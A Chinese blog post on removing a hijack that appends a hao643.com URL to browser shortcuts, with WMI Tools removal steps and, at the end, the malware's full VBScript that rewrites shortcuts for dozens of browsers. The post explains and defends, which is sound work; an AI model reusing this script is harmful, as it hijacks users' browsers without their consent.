hao643.com劫持解決辦法

>癥狀:

所有瀏覽器快捷方式,都被加上尾巴,例如IE的:"C:\Program Files\Internet Explorer\iexplore.exe" http://hao643.com/?r=ggggg&m=c104

手工去掉尾巴后,每隔一定時間(網友說是30分鐘)后,尾巴重新被加上。

PS:這病毒僅修改快捷方式,應該沒有其它病毒特征。

>解決方案:

1.安裝WMITools(點擊下載

2.管理員身份打開 C:\Program Files (x86)\WMI Tools\wbemeventviewer.exe

3.點擊左上角按鈕register for events

4.OK--OK

5.第1個下拉菜單有3個選擇項:Consumers、Filters、Timers

6.把這3個選擇項下的所有實例全部刪除(右鍵菜單,Delete instance)

7.去掉所有瀏覽器快捷方式的尾巴--涉及瀏覽器:114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe

8.Done.

>參考:

http://www.pc18.com/soft/15730.html

http://jingyan.baidu.com/article/0964eca26f47b38285f536c6.html

>附 病毒腳本

1OnErrorResumeNext:Constlink ="http://hao643.com/?r=ggggg&m=c104":Constlink360 ="http://hao643.com/?r=ggggg&m=c104&s=3":browsers ="114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":lnkpaths ="C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\ChenShao\Desktop,C:\Users\ChenShao\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\ChenShao\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\ChenShao\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\ChenShao\AppData\Roaming\Microsoft\Windows\Start Menu\Programs":browsersArr =split(browsers,","):SetoDic =CreateObject("scripting.dictionary"):ForEachbrowserInbrowsersArr:oDic.AddLCase(browser), browser:Next:lnkpathsArr =split(lnkpaths,","):SetoFolders =CreateObject("scripting.dictionary"):ForEachlnkpathInlnkpathsArr:oFolders.Add lnkpath, lnkpath:Next:Setfso =CreateObject("Scripting.Filesystemobject"):SetWshShell =CreateObject("Wscript.Shell"):ForEachoFolderInoFolders:Iffso.FolderExists(oFolder)Then:ForEachfileInfso.GetFolder(oFolder).Files:IfLCase(fso.GetExtensionName(file.Path)) ="lnk"Then:SetoShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) &"."& fso.GetExtensionName(path):IfoDic.Exists(LCase(name))Then:IfLCase(name) =LCase("360se.exe")Then:oShellLink.Arguments = link360:Else:oShellLink.Arguments = link:EndIf:Iffile.AttributesAnd1Then:file.Attributes = file.Attributes -1:EndIf:oShellLink.Save:EndIf:EndIf:Next:EndIf:Next:

View Code

>PS:

大學期間,hao123是我非常非常喜歡的網站,幫人裝完系統之后,都把它設置為主頁;百度收購之后,好感度下降,但還用著;發現它惡意推廣之后,此生再也沒打開過hao123(被強制彈出的除外)。

最后編輯于
?著作權歸作者所有,轉載或內容合作請聯系作者
平臺聲明:文章內容(如有圖片或視頻亦包括在內)由作者上傳并發布,文章內容僅代表作者本人觀點,簡書系信息發布平臺,僅提供信息存儲服務。

推薦閱讀更多精彩內容